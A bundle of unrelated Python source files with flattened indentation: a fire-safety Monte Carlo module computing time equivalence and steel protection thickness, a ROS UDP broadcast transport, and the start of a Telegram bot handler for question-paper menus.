feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
feature_train = feature_train.drop(labels='user', axis=1)
train_base_df = train_base_df.join(feature_train)
train_base_df.to_csv(base_dir + '/dataset/dataset2/trainset/train_main.csv', index=False)
|
mcs0_calc.py
|
# -*- coding: utf-8 -*-
import copy
import os
import threading
import warnings
from typing import Union, Callable
import numpy as np
import pandas as pd
from fsetools.lib.fse_bs_en_1991_1_2_parametric_fire import temperature as _fire_param
from fsetools.lib.fse_bs_en_1993_1_2_heat_transfer_c import protection_thickness as _protection_thickness
from fsetools.lib.fse_bs_en_1993_1_2_heat_transfer_c import temperature as _steel_temperature
from fsetools.lib.fse_bs_en_1993_1_2_heat_transfer_c import temperature_max as _steel_temperature_max
from fsetools.lib.fse_din_en_1991_1_2_parametric_fire import temperature as _fire_param_ger
from fsetools.lib.fse_travelling_fire import temperature as fire_travelling
from scipy.interpolate import interp1d
from sfeprapy.func.asciiplot import AsciiPlot
from sfeprapy.func.mcs import MCS
def _fire_travelling(**kwargs):
if isinstance(kwargs["beam_location_length_m"], list) or isinstance(
kwargs["beam_location_length_m"], np.ndarray
):
kwarg_ht_ec = dict(
fire_time=kwargs["t"],
beam_rho=7850,
beam_cross_section_area=0.017,
protection_k=0.2,
protection_rho=800,
protection_c=1700,
protection_thickness=0.005,
protection_protected_perimeter=2.14,
)
temperature_steel_list = list()
temperature_gas_list = fire_travelling(**kwargs)
for temperature in temperature_gas_list:
kwarg_ht_ec["fire_temperature"] = temperature + 273.15
T_a_max, t = _steel_temperature_max(**kwarg_ht_ec)
temperature_steel_list.append(T_a_max)
return (
temperature_gas_list[np.argmax(temperature_steel_list)] + 273.15,
kwargs["beam_location_length_m"][[np.argmax(temperature_steel_list)]][0],
)
elif isinstance(kwargs["beam_location_length_m"], float) or isinstance(
kwargs["beam_location_length_m"], int
):
return fire_travelling(**kwargs) + 273.15, kwargs["beam_location_length_m"]
def decide_fire(
window_height: float,
window_width: float,
window_open_fraction: float,
room_breadth: float,
room_depth: float,
room_height: float,
fire_mode: int,
fire_load_density: float,
fire_combustion_efficiency: float,
fire_hrr_density: float,
fire_spread_speed: float,
*_,
**__,
) -> dict:
"""Calculates equivalent time exposure for a protected steel element member in more realistic fire environment
opposing to the standard fire curve ISO 834.
PARAMETERS:
:param window_height: [m], weighted window opening height
:param window_width: [m], total window opening width
:param window_open_fraction: [-], a factor is multiplied with the given total window opening area
:param room_breadth: [m], room breadth (shorter direction of the floor plan)
:param room_depth: [m], room depth (longer direction of the floor plan)
:param room_height: [m], room height from floor to soffit (structural), disregard any non fire resisting floors
:param fire_hrr_density: [MW m-2], fire maximum release rate per unit area
:param fire_load_density:
:param fire_combustion_efficiency:
:param fire_spread_speed: [m s-1], TRAVELLING FIRE, fire spread speed
:param fire_mode: 0 - parametric, 1 - travelling, 2 - ger parametric, 3 - (0 & 1), 4 (1 & 2)
:return:
EXAMPLE:
"""
# PERMEABLE AND INPUT CHECKS
fire_load_density_deducted = fire_load_density * fire_combustion_efficiency
# Total window opening area
window_area = window_height * window_width * window_open_fraction
# Room floor area
room_floor_area = room_breadth * room_depth
# Room internal surface area, total, including window openings
room_total_area = (2 * room_floor_area) + ((room_breadth + room_depth) * 2 * room_height)
# Fire load density related to the total surface area A_t
fire_load_density_total = (
fire_load_density_deducted * room_floor_area / room_total_area
)
# Opening factor
opening_factor = window_area * np.sqrt(window_height) / room_total_area
# Spread speed - Does the fire spread to involve the full compartment?
fire_spread_entire_room_time = room_depth / fire_spread_speed
burn_out_time = max([fire_load_density_deducted / fire_hrr_density, 900.0])
if fire_mode == 0 or fire_mode == 1 or fire_mode == 2: # enforced to selected fire, i.e. 0 is ec parametric; 1 is travelling; and 2 is din ec parametric
fire_type = fire_mode
elif fire_mode == 3: # enforced to ec parametric + travelling
if (
fire_spread_entire_room_time < burn_out_time
and 0.01 < opening_factor <= 0.2
and 50 <= fire_load_density_total <= 1000
):
fire_type = 0 # parametric fire
else: # Otherwise, it is a travelling fire
fire_type = 1 # travelling fire
elif fire_mode == 4: # enforced to german parametric + travelling
# If fire spreads throughout compartment and ventilation is within EC limits = Parametric fire
if (
fire_spread_entire_room_time < burn_out_time
and 0.125 <= (window_area / room_floor_area) <= 0.5
):
fire_type = 2 # german parametric
else: # Otherwise, it is a travelling fire
fire_type = 1 # travelling fire
else:
raise ValueError("Unknown fire mode {fire_mode}.".format(fire_mode=fire_mode))
return dict(fire_type=fire_type)
def evaluate_fire_temperature(
window_height: float,
window_width: float,
window_open_fraction: float,
room_breadth: float,
room_depth: float,
room_height: float,
room_wall_thermal_inertia: float,
fire_tlim: float,
fire_type: float,
fire_time: Union[list, np.ndarray],
fire_nft_limit: float,
fire_load_density: float,
fire_combustion_efficiency: float,
fire_hrr_density: float,
fire_spread_speed: float,
fire_t_alpha: float,
fire_gamma_fi_q: float,
beam_position_vertical: float,
beam_position_horizontal: Union[np.ndarray, list, float] = -1.0,
*_,
**__,
) -> dict:
"""Calculate temperature array of pre-defined fire type `fire_type`.
PARAMETERS:
:param window_height: [m], weighted window opening height
:param window_width: [m], total window opening width
:param window_open_fraction: [-], a factor is multiplied with the given total window opening area
:param room_breadth: [m], room breadth (shorter direction of the floor plan)
:param room_depth: [m], room depth (longer direction of the floor plan)
:param room_height: [m], room height from floor to soffit (structural), disregard any non fire resisting floors
:param room_wall_thermal_inertia: [J m-2 K-1 s-1/2], thermal inertia of room lining material
:param fire_tlim: [s], PARAMETRIC FIRE, see parametric fire function for details
:param fire_type: [-],
:param fire_time: [K],
:param fire_load_density:
:param fire_combustion_efficiency:
:param fire_t_alpha:
:param fire_gamma_fi_q:
:param beam_position_vertical:
:param fire_hrr_density: [MW m-2], fire maximum release rate per unit area
:param fire_spread_speed: [m s-1], TRAVELLING FIRE, fire spread speed
:param beam_position_horizontal: [s], beam location, will be solved for the worst case if less than 0.
:param fire_nft_limit: [K], TRAVELLING FIRE, maximum temperature of near field temperature
:return:
EXAMPLE:
"""
fire_load_density_deducted = fire_load_density * fire_combustion_efficiency
# Total window opening area
window_area = window_height * window_width * window_open_fraction
# Room floor area
room_floor_area = room_breadth * room_depth
# Room internal surface area, total, including window openings
room_total_area = 2 * room_floor_area + (room_breadth + room_depth) * 2 * room_height
if fire_type == 0:
kwargs_fire_0_paramec = dict(
t=fire_time,
A_t=room_total_area,
A_f=room_floor_area,
A_v=window_area,
h_eq=window_height,
q_fd=fire_load_density_deducted * 1e6,
lambda_=room_wall_thermal_inertia ** 2,
rho=1,
c=1,
t_lim=fire_tlim,
temperature_initial=20 + 273.15,
)
fire_temperature = _fire_param(**kwargs_fire_0_paramec)
elif fire_type == 1:
if beam_position_horizontal < 0:
beam_position_horizontal = np.linspace(0.5 * room_depth, room_depth, 7)[1:-1]
kwargs_fire_1_travel = dict(
t=fire_time,
fire_load_density_MJm2=fire_load_density_deducted,
fire_hrr_density_MWm2=fire_hrr_density,
room_length_m=room_depth,
room_width_m=room_breadth,
fire_spread_rate_ms=fire_spread_speed,
beam_location_height_m=beam_position_vertical,
beam_location_length_m=beam_position_horizontal,
fire_nft_limit_c=fire_nft_limit - 273.15,
opening_width_m=window_width,
opening_height_m=window_height,
opening_fraction=window_open_fraction,
)
fire_temperature, beam_position_horizontal = _fire_travelling(**kwargs_fire_1_travel)
if beam_position_horizontal <= 0:
raise ValueError("Beam position less or equal to 0.")
elif fire_type == 2:
kwargs_fire_2_param_din = dict(
t_array_s=fire_time,
A_w_m2=window_area,
h_w_m2=window_height,
A_t_m2=room_total_area,
A_f_m2=room_floor_area,
t_alpha_s=fire_t_alpha,
b_Jm2s05K=room_wall_thermal_inertia,
q_x_d_MJm2=fire_load_density_deducted,
gamma_fi_Q=fire_gamma_fi_q,
)
fire_temperature = _fire_param_ger(**kwargs_fire_2_param_din)
else:
fire_temperature = None
return dict(
fire_temperature=fire_temperature,
beam_position_horizontal=beam_position_horizontal,
)
def solve_time_equivalence_iso834(
beam_cross_section_area: float,
beam_rho: float,
protection_k: float,
protection_rho: float,
protection_c: float,
protection_protected_perimeter: float,
fire_time_iso834: Union[list, np.ndarray],
fire_temperature_iso834: Union[list, np.ndarray],
solver_temperature_goal: float,
solver_protection_thickness: float,
phi_teq: float,
*_,
**__,
) -> dict:
"""
**WIP**
Calculates equivalent time exposure for a protected steel element member in more realistic fire environment
opposing to the standard fire curve ISO 834.
PARAMETERS:
:param fire_time: [s], time array
:param fire_temperature: [K], temperature array
:param beam_cross_section_area: [m2], the steel beam element cross section area
:param beam_rho: [kg/m3], steel beam element density
:param protection_k: steel beam element protection material thermal conductivity
:param protection_rho: steel beam element protection material density
:param protection_c: steel beam element protection material specific heat
:param protection_protected_perimeter: [m], steel beam element protection material perimeter
:param fire_time_iso834: [s], the time (array) component of ISO 834 fire curve
:param fire_temperature_iso834: [K], the temperature (array) component of ISO 834 fire curve
:param solver_temperature_goal: [K], steel beam element expected failure temperature
:param solver_max_iter: Maximum allowable iteration counts for seeking solution for time equivalence
:param solver_thickness_ubound: [m], protection layer thickness upper bound initial condition for solving time equivalence
:param solver_thickness_lbound: [m], protection layer thickness lower bound initial condition for solving time equivalence
:param solver_tol: [K], tolerance for solving time equivalence
:param phi_teq: [-], model uncertainty factor
:return results: dict
EXAMPLE:
"""
# ============================================
# GOAL SEEK TO MATCH STEEL FAILURE TEMPERATURE
# ============================================
# MATCH PEAK STEEL TEMPERATURE BY ADJUSTING PROTECTION LAYER THICKNESS
# Solve equivalent time exposure in ISO 834
solver_d_p = solver_protection_thickness
if -np.inf < solver_d_p < np.inf:
steel_temperature = _steel_temperature(
fire_time=fire_time_iso834,
fire_temperature=fire_temperature_iso834,
beam_rho=beam_rho,
beam_cross_section_area=beam_cross_section_area,
protection_k=protection_k,
protection_rho=protection_rho,
protection_c=protection_c,
protection_thickness=solver_d_p,
protection_protected_perimeter=protection_protected_perimeter,
)
func_teq = interp1d(steel_temperature, fire_time_iso834, kind="linear", bounds_error=False, fill_value=-1)
solver_time_equivalence_solved = func_teq(solver_temperature_goal)
solver_time_equivalence_solved = solver_time_equivalence_solved * phi_teq
elif solver_d_p == np.inf:
solver_time_equivalence_solved = np.inf
elif solver_d_p == -np.inf:
solver_time_equivalence_solved = -np.inf
elif solver_d_p is np.nan:
solver_time_equivalence_solved = np.nan
else:
raise ValueError(f'This error should not occur, solver_d_p = {solver_d_p}')
return dict(solver_time_equivalence_solved=solver_time_equivalence_solved)
def solve_protection_thickness(
fire_time: Union[list, np.ndarray],
fire_temperature: Union[list, np.ndarray],
beam_cross_section_area: float,
beam_rho: float,
protection_k: float,
protection_rho: float,
protection_c: float,
protection_protected_perimeter: float,
solver_temperature_goal: float,
solver_max_iter: int,
solver_thickness_ubound: float,
solver_thickness_lbound: float,
solver_tol: float,
*_,
**__,
) -> dict:
"""
Calculates equivalent time exposure for a protected steel element member in more realistic fire environment
opposing to the standard fire curve ISO 834.
PARAMETERS:
:param fire_time: [s], time array
:param fire_temperature: [K], temperature array
:param beam_cross_section_area: [m2], the steel beam element cross section area
:param beam_rho: [kg/m3], steel beam element density
:param protection_k: steel beam element protection material thermal conductivity
:param protection_rho: steel beam element protection material density
:param protection_c: steel beam element protection material specific heat
:param protection_protected_perimeter: [m], steel beam element protection material perimeter
:param fire_time_iso834: [s], the time (array) component of ISO 834 fire curve
:param fire_temperature_iso834: [K], the temperature (array) component of ISO 834 fire curve
:param solver_temperature_goal: [K], steel beam element expected failure temperature
:param solver_max_iter: Maximum allowable iteration counts for seeking solution for time equivalence
:param solver_thickness_ubound: [m], protection layer thickness upper bound initial condition for solving time equivalence
:param solver_thickness_lbound: [m], protection layer thickness lower bound initial condition for solving time equivalence
:param solver_tol: [K], tolerance for solving time equivalence
:param phi_teq: [-], model uncertainty factor
:return results: dict
EXAMPLE:
"""
# ============================================
# GOAL SEEK TO MATCH STEEL FAILURE TEMPERATURE
# ============================================
# MATCH PEAK STEEL TEMPERATURE BY ADJUSTING PROTECTION LAYER THICKNESS
# Solve protection properties for `solver_temperature_goal`
solver_d_p, solver_T_max_a, solver_t, solver_iter_count = _protection_thickness(
fire_time=fire_time,
fire_temperature=fire_temperature,
beam_rho=beam_rho,
beam_cross_section_area=beam_cross_section_area,
protection_k=protection_k,
protection_rho=protection_rho,
protection_c=protection_c,
protection_protected_perimeter=protection_protected_perimeter,
solver_temperature_goal=solver_temperature_goal,
solver_temperature_goal_tol=solver_tol,
solver_max_iter=solver_max_iter,
d_p_1=solver_thickness_lbound,
d_p_2=solver_thickness_ubound,
)
return dict(
solver_convergence_status=-np.inf < solver_d_p < np.inf,
solver_steel_temperature_solved=solver_T_max_a,
solver_time_solved=solver_t,
solver_protection_thickness=solver_d_p,
solver_iter_count=solver_iter_count,
)
def mcs_out_post_per_case(df: pd.DataFrame, fp: str) -> pd.DataFrame:
# save outputs if work direction is provided per iteration
if fp:
def _save_(fp_: str):
try:
if not os.path.exists(os.path.dirname(fp_)):
os.makedirs(os.path.dirname(fp_))
except Exception as e:
print(e)
df.to_csv(os.path.join(fp_), index=False)
threading.Thread(target=_save_, kwargs=dict(fp_=fp)).start()
df_res = copy.copy(df)
df_res = df_res.replace(to_replace=[np.inf, -np.inf], value=np.nan)
df_res = df_res.dropna(axis=0, how="any")
dict_ = dict()
dict_["fire_type"] = str(
{
k: np.sum(df_res["fire_type"].values == k)
for k in np.unique(df_res["fire_type"].values)
}
)
for k in [
"beam_position_horizontal",
"fire_combustion_efficiency",
"fire_hrr_density",
"fire_load_density",
"fire_nft_limit",
"fire_spread_speed",
"window_open_fraction",
"phi_teq",
"timber_fire_load",
]:
try:
x = df_res[k].values
x1, x2, x3 = np.min(x), np.mean(x), np.max(x)
dict_[k] = f"{x1:<9.3f} {x2:<9.3f} {x3:<9.3f}"
except Exception:
pass
list_ = [f"{k:<24.24}: {v}" for k, v in dict_.items()]
print("\n".join(list_), "\n")
try:
x = np.array(df_res['solver_time_equivalence_solved'].values / 60, dtype=float)
x[x == -np.inf] = 0
x[x == np.inf] = np.amax(x[x != np.inf])
y = np.linspace(0, 1, len(x), dtype=float)
aplot = AsciiPlot(size=(55, 15))
aplot.plot(x=x, y=y, xlim=(20, min([180, np.amax(x)])))
aplot.show()
except Exception as e:
print(f'Failed to plot time equivalence, {e}')
return df
def teq_main_wrapper(args):
try:
kwargs, q = args
q.put("index: {}".format(kwargs["index"]))
return teq_main(**kwargs)
except (ValueError, AttributeError):
return teq_main(**args)
def teq_main(
case_name: str,
n_simulations: int,
index: int,
beam_cross_section_area: float,
beam_position_vertical: float,
beam_position_horizontal: float,
beam_rho: float,
fire_time_duration: float,
fire_time_step: float,
fire_combustion_efficiency: float,
fire_gamma_fi_q: float,
fire_hrr_density: float,
fire_load_density: float,
fire_mode: int,
fire_nft_limit: float,
fire_spread_speed: float,
fire_t_alpha: float,
fire_tlim: float,
protection_c: float,
protection_k: float,
protection_protected_perimeter: float,
protection_rho: float,
room_breadth: float,
room_depth: float,
room_height: float,
room_wall_thermal_inertia: float,
solver_temperature_goal: float,
solver_max_iter: int,
solver_thickness_lbound: float,
solver_thickness_ubound: float,
solver_tol: float,
window_height: float,
window_open_fraction: float,
window_width: float,
window_open_fraction_permanent: float,
phi_teq: float = 1.0,
timber_charring_rate=None,
timber_hc: float = None,
timber_density: float = None,
timber_exposed_area: float = None,
timber_solver_tol: float = None,
timber_solver_ilim: float = None,
*_,
**__,
) -> dict:
# Make the longest dimension between (room_depth, room_breadth) as room_depth
if room_depth < room_breadth:
room_depth += room_breadth
room_breadth = room_depth - room_breadth
room_depth -= room_breadth
window_open_fraction = (window_open_fraction * (1 - window_open_fraction_permanent) + window_open_fraction_permanent)
# Fix ventilation opening size so it doesn't exceed wall area
if window_height > room_height:
window_height = room_height
# Calculate fire time, this is used for all fire curves in the calculation
fire_time = np.arange(0, fire_time_duration + fire_time_step, fire_time_step)
# Calculate ISO 834 fire temperature
fire_time_iso834 = fire_time
fire_temperature_iso834 = (345.0 * np.log10((fire_time / 60.0) * 8.0 + 1.0) + 20.0) + 273.15 # in [K]
inputs = copy.deepcopy(locals())
inputs.pop('_'), inputs.pop('__')
# initialise solver iteration count for timber fuel contribution
timber_solver_iter_count = -1
timber_exposed_duration = 0 # initial condition, timber exposed duration
_fire_load_density_ = inputs.pop('fire_load_density') # preserve original fire load density
while True:
timber_solver_iter_count += 1
if isinstance(timber_charring_rate, (float, int)):
timber_charring_rate_i = timber_charring_rate
elif isinstance(timber_charring_rate, Callable):
timber_charring_rate_i = timber_charring_rate(timber_exposed_duration)
else:
raise TypeError('`timber_charring_rate_i` is not numerical nor Callable type')
timber_charring_rate_i *= 1 / 1000 # [mm/min] -> [m/min]
timber_charring_rate_i *= 1 / 60 # [m/min] -> [m/s]
timber_charred_depth = timber_charring_rate_i * timber_exposed_duration
timber_charred_volume = timber_charred_depth * timber_exposed_area
timber_charred_mass = timber_density * timber_charred_volume
timber_fire_load = timber_charred_mass * timber_hc
timber_fire_load_density = timber_fire_load / (room_breadth * room_depth)
inputs['fire_load_density'] = _fire_load_density_ + timber_fire_load_density
# To check what design fire to use
inputs.update(decide_fire(**inputs))
# To calculate design fire temperature
inputs.update(evaluate_fire_temperature(**inputs))
# To solve protection thickness at critical temperature
inputs.update(solve_protection_thickness(**inputs))
# additional fuel contribution from timber
if timber_exposed_area <= 0 or timber_exposed_area is None: # no timber exposed
# Exit timber fuel contribution solver if:
# 1. no timber exposed
# 2. timber exposed area undefined
break
elif timber_solver_iter_count >= timber_solver_ilim:
inputs['solver_convergence_status'] = np.nan
inputs['solver_steel_temperature_solved'] = np.nan
inputs['solver_time_solved'] = np.nan
inputs['solver_protection_thickness'] = np.nan
inputs['solver_iter_count'] = np.nan
timber_exposed_duration = np.nan
break
elif not -np.inf < inputs["solver_protection_thickness"] < np.inf:
# no protection thickness solution
timber_exposed_duration = inputs['solver_protection_thickness']
break
elif abs(timber_exposed_duration - inputs["solver_time_solved"]) <= timber_solver_tol:
# convergence sought successfully
break
else:
timber_exposed_duration = inputs["solver_time_solved"]
inputs.update(solve_time_equivalence_iso834(**inputs))
inputs.update(
dict(
timber_charring_rate=timber_charring_rate_i,
timber_exposed_duration=timber_exposed_duration,
timber_solver_iter_count=timber_solver_iter_count,
timber_fire_load=timber_fire_load,
timber_charred_depth=timber_charred_depth,
timber_charred_mass=timber_charred_mass,
timber_charred_volume=timber_charred_volume,
)
)
# Prepare results to be returned, only the items in the list below will be returned
# add keys accordingly if more parameters are desired to be returned
outputs = {
i: inputs[i] for i in
['phi_teq', 'fire_spread_speed', 'fire_nft_limit', 'fire_mode', 'fire_load_density', 'fire_hrr_density', 'fire_combustion_efficiency', 'beam_position_horizontal',
# 'beam_position_vertical', 'index', 'probability_weight', 'case_name', 'fire_type', 'solver_convergence_status', 'solver_time_equivalence_solved',
'beam_position_vertical', 'index', 'case_name', 'fire_type', 'solver_convergence_status', 'solver_time_equivalence_solved',
'solver_steel_temperature_solved', 'solver_protection_thickness', 'solver_iter_count', 'window_open_fraction', 'timber_solver_iter_count', 'timber_charred_depth']
}
return outputs
def mcs_out_post_all_cases(df: pd.DataFrame, fp: str):
if fp:
df[['case_name', 'index', 'solver_time_equivalence_solved']].to_csv(fp, index=False)
class MCS0(MCS):
def __init__(self):
super().__init__()
def mcs_deterministic_calc(self, *args, **kwargs) -> dict:
return teq_main(*args, **kwargs)
def mcs_deterministic_calc_mp(self, *args, **kwargs) -> dict:
return teq_main_wrapper(*args, **kwargs)
def mcs_post_per_case(self, df: pd.DataFrame):
case_name = df['case_name'].to_numpy()
assert (case_name == case_name[0]).all()
case_name = case_name[0]
try:
fp = os.path.join(self.cwd, self.DEFAULT_TEMP_FOLDER_NAME, f'{case_name}.csv')
except TypeError:
fp = None
return mcs_out_post_per_case(df=df, fp=fp)
def mcs_post_all_cases(self, df: pd.DataFrame):
try:
fp = os.path.join(self.cwd, self.DEFAULT_MCS_OUTPUT_FILE_NAME)
except TypeError:
fp = None
return mcs_out_post_all_cases(df=df, fp=fp)
def _test_teq_phi():
warnings.filterwarnings("ignore")
from sfeprapy.func.fire_iso834 import fire as fire_iso834
fire_time_ = np.arange(0, 2 * 60 * 60, 1)
fire_temperature_iso834_ = fire_iso834(fire_time_, 293.15)
input_param = dict(
index=0,
case_name="Standard 1",
probability_weight=1.,
fire_time_step=1.,
fire_time_duration=5. * 60 * 60,
n_simulations=1,
beam_cross_section_area=0.017,
beam_position_vertical=2.5,
beam_position_horizontal=18,
beam_rho=7850.,
fire_combustion_efficiency=0.8,
fire_gamma_fi_q=1,
fire_hrr_density=0.25,
fire_load_density=420,
fire_mode=0,
fire_nft_limit=1050,
fire_spread_speed=0.01,
fire_t_alpha=300,
fire_tlim=0.333,
fire_temperature_iso834=fire_temperature_iso834_,
fire_time_iso834=fire_time_,
protection_c=1700.,
protection_k=0.2,
protection_protected_perimeter=2.14,
protection_rho=800.,
room_breadth=16,
room_depth=31.25,
room_height=3,
room_wall_thermal_inertia=720,
solver_temperature_goal=620 + 273.15,
solver_max_iter=200,
solver_thickness_lbound=0.0001,
solver_thickness_ubound=0.0500,
solver_tol=0.01,
window_height=2,
window_open_fraction=0.8,
window_width=72,
window_open_fraction_permanent=0,
phi_teq=0.1,
timber_charring_rate=0.7,
timber_exposed_area=0,
timber_hc=400,
timber_density=500,
timber_solver_ilim=20,
timber_solver_tol=1,
)
input_param["phi_teq"] = 1.0
teq_10 = teq_main(**input_param)["solver_time_equivalence_solved"]
input_param["phi_teq"] = 0.1
teq_01 = teq_main(**input_param)["solver_time_equivalence_solved"]
print(
f'Time equivalence at phi_teq=0.1: {teq_01:<8.3f}\n'
f'Time equivalence at phi_teq=1.0: {teq_10:<8.3f}\n'
f'Ratio between the above: {teq_10 / teq_01:<8.3f}\n'
)
assert abs(teq_10 / teq_01 - 10) < 0.01
def _test_standard_case():
import copy
from sfeprapy.mcs0 import EXAMPLE_INPUT_DICT, EXAMPLE_CONFIG_DICT
from scipy.interpolate import interp1d
# increase the number of simulations so it gives sensible results
mcs_input = copy.deepcopy(EXAMPLE_INPUT_DICT)
mcs_config = copy.deepcopy(EXAMPLE_CONFIG_DICT)
mcs_config["n_threads"] = 1
mcs = MCS0()
mcs.mcs_inputs = mcs_input
mcs.mcs_config = mcs_config
mcs.run_mcs()
mcs_out = mcs.mcs_out
def get_time_equivalence(data, fractile: float):
hist, edges = np.histogram(data, bins=np.arange(0, 181, 0.5))
x, y = (edges[:-1] + edges[1:]) / 2, np.cumsum(hist / np.sum(hist))
return interp1d(y, x)(fractile)
mcs_out_standard_case_1 = mcs_out.loc[mcs_out['case_name'] == 'Standard Case 1']
teq = mcs_out_standard_case_1["solver_time_equivalence_solved"] / 60.0
teq_at_80_percentile = get_time_equivalence(teq, 0.8)
print(f'Time equivalence at CDF 0.8 is {teq_at_80_percentile:<6.3f} min')
target, target_tol = 60, 2
assert target - target_tol < teq_at_80_percentile < target + target_tol
mcs_out_standard_case_2 = mcs_out.loc[mcs_out['case_name'] == 'Standard Case 2 (with teq_phi)']
teq = mcs_out_standard_case_2["solver_time_equivalence_solved"] / 60.0
teq_at_80_percentile = get_time_equivalence(teq, 0.8)
print(f'Time equivalence at CDF 0.8 is {teq_at_80_percentile:<6.3f} min')
target, target_tol = 64, 2 # 64 minutes based on a test run on 2nd Oct 2020
assert target - target_tol < teq_at_80_percentile < target + target_tol
mcs_out_standard_case_3 = mcs_out.loc[mcs_out['case_name'] == 'Standard Case 3 (with timber)']
teq = mcs_out_standard_case_3["solver_time_equivalence_solved"] / 60.0
teq_at_80_percentile = get_time_equivalence(teq, 0.8)
print(f'Time equivalence at CDF 0.8 is {teq_at_80_percentile:<6.3f} min')
target, target_tol = 90, 2 # 81 minutes based on a test run on 2nd Oct 2020
assert target - target_tol < teq_at_80_percentile < target + target_tol
if __name__ == '__main__':
_test_teq_phi()
_test_standard_case()
|
transport.py
|
#!/usr/bin/env python
# https://stackoverflow.com/questions/12607516/python-udp-broadcast-not-sending
# https://stackoverflow.com/questions/15962119/using-bytearray-with-socket-recv-into
from socket import *
# Dynamic load msg classes
import roslib
import imp
import sys
import threading
import rospy
from StringIO import StringIO
from multimaster_udp.msg import Msg, TopicInfo
from multimaster_udp.srv import AdvertiseUDP
if sys.version_info >= (3, 0):
import socketserver
else:
import SocketServer as socketserver
def get_class(msg_class):
def load_pkg_module(package, directory):
#check if its in the python path
path = sys.path
try:
imp.find_module(package)
except:
roslib.load_manifest(package)
try:
m = __import__( package + '.' + directory )
except:
rospy.logerr( "Cannot import package : %s"% package )
rospy.logerr( "sys.path was " + str(path) )
return None
return m
def load_message(package, message):
m = load_pkg_module(package, 'msg')
m2 = getattr(m, 'msg')
return getattr(m2, message)
try:
loaded_class = load_message(*msg_class.split('/'))
except:
loaded_class = None
finally:
return loaded_class
def UDPSetup(topic_name, data_type):
topic = TopicInfo(topic_name, data_type._type, data_type._md5sum, 0)
rospy.wait_for_service("organizer/topic")
topic_srv = rospy.ServiceProxy("organizer/topic", AdvertiseUDP)
result = topic_srv.call(topic)
return result.topic
class UDPPublisher(object):
"""docstring for UDPPublisher"""
def __init__(self, topic_name, data_type, network_address="192.168.1.1", network_size=8):
super(UDPPublisher, self).__init__()
self.topic = UDPSetup(topic_name, data_type)
port = self.setup_communications()
self.network = self.__make_address(network_address, network_size, self.topic.port)
# Use ready once communication to the master is done, also, update the port
self.ready = True
def setup_communications(self):
self.cs = socket(AF_INET, SOCK_DGRAM)
self.cs.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.cs.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
def __send(self, data):
if data._type == "multimaster_udp/Msg":
buff = StringIO()
data.serialize(buff)
self.cs.sendto(buff.getvalue(), self.network)
else:
# Wrong msg type
pass
def publish(self, rosmsg):
"""
publish(rosmsg)
High level publish of messages
"""
if self.ready:
msg = Msg()
msg.data_type = rosmsg._type
buff = StringIO()
rosmsg.serialize(buff)
msg.data = buff.getvalue()
msg.length = buff.len
self.__send(msg)
def __make_address(self, network_address, network_size, port):
""" __make_address creates a network
adress and returns it in the str format
192.168.1.12/8 returns 192.168.1.255
"""
splitted = map(int, network_address.split('.'))
current = 3
while network_size > 0 and current >= 0:
if network_size >= 8:
splitted[current] = 255
else :
splitted[current] = splitted[current] | (2**network_size-1)
network_size -= 8
current -= 1
return (".".join(map(str, splitted)), port)
class UDPHandlerServer(socketserver.UDPServer):
"""docstring for UDPHandlerServer"""
# IP limitation
max_packet_size = 64000
allow_reuse_address = True
def __init__(self, callback, *args, **kwargs):
socketserver.UDPServer.__init__(self, *args, **kwargs)
self.callback = callback
def finish_request(self, request, client_address):
self.callback(request, client_address)
class UDPSubscriber(object):
"""docstring for UDPSubscriber"""
def __init__(self, topic_name, data_type, callback=None):
self.data_type = data_type
self.topic = UDPSetup(topic_name, data_type)
if callback is None:
self.local_pub = rospy.Publisher(topic_name, data_type, queue_size=10)
else:
self.callback = callback
self.server = UDPHandlerServer(self.__handle_callback, ("0.0.0.0", self.topic.port), socketserver.BaseRequestHandler)
self.t = threading.Thread(target = self.server.serve_forever)
self.t.start()
rospy.on_shutdown(self.shutdown)
def __handle_callback(self, request, client_address):
inmsg = Msg()
inmsg.deserialize(request[0])
if inmsg.data_type == self.topic.data_type:
msg = self.data_type()
msg.deserialize(inmsg.data)
self.callback(msg, self.topic)
# else error or
# Dynamic message loading
# dataClass = get_class(inmsg.data_type)
# msg = dataClass()
def callback(self, msg, topic):
self.local_pub.publish(msg)
def shutdown(self):
self.server.shutdown()
|
qpapers.py
|
import re
import threading
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.chataction import ChatAction
from telegram.error import BadRequest
from telegram.ext.dispatcher import run_async
from Brain.Modules.help import get_help
from Brain.Utils import button_menu, qpaper_utils
from Brain.Utils.dbfuncs import query_collect, command_collect
from Brain.Utils.dbfuncs import user_collect
from Brain.Utils.strings import HELPER_SCRIPTS, COURSES_LIST, SEMS, BRANCHES_COURSE, BASE_URL
from server import logger
qpapers_info_help = \
"""
- /qpapers - Click to get Question Papers \U0001F4C3
"""
HELPER_SCRIPTS['qpapers'] = qpapers_info_help
def course(text):
button_list = []
course = ""
course_in = text[0]
for module, tag in COURSES_LIST.items():
if course_in == tag:
course = module
for branch, branch_code in BRANCHES_COURSE[course].items():
branch_full = branch
nextt = [course_in, branch_code]
button_list.append(
InlineKeyboardButton(
text="{}".format(branch_full),
callback_data="qa={}".format("+".join(nextt)), )
)
colm = 2
word = """Selected Course: `{}` \nSelect Branch :""".format(course)
return button_list, word, colm
def course_branch(text):
button_list = []
colm = 2
course_full = branch_full = ''
course_in, branch_in = text
for module, tag in COURSES_LIST.items():
if course_in == tag:
course_full = module
break
for branchy, key in BRANCHES_COURSE[course_full].items():
if branch_in == key:
branch_full = branchy
break
word = """Selected Course: `{}` \nSelected Branch: `{}` \nSelect Sem :""". \
format(course_full, branch_full)
for sem in range(1, SEMS[course_full] + 1):
nextt = [course_in, branch_in, str(sem)]
button_list.append(
InlineKeyboardButton(
text="{}".format(sem),
callback_data="qa={}".format("+".join(nextt)),
)
)
# back_button data
back_data = "qa={}".format("+".join([course_in]))
return button_list, word, colm, back_data
def course_branch_sem(text):
button_list = []
colm = 1
course_full = branch_full = ''
course_in, branch_in, sem_in = text
for module, tag in COURSES_LIST.items():
if course_in == tag:
course_full = module
break
for branch, key in BRANCHES_COURSE[course_full].items():
if branch_in == key:
branch_full = branch
break
word = """Selected Course: `{}` \nSelected Branch: `{}` \nSelected Sem: `{}` \nSelect Subject :""". \
format(course_full, branch_full, sem_in)
# we don't use 'papers' here just use subs
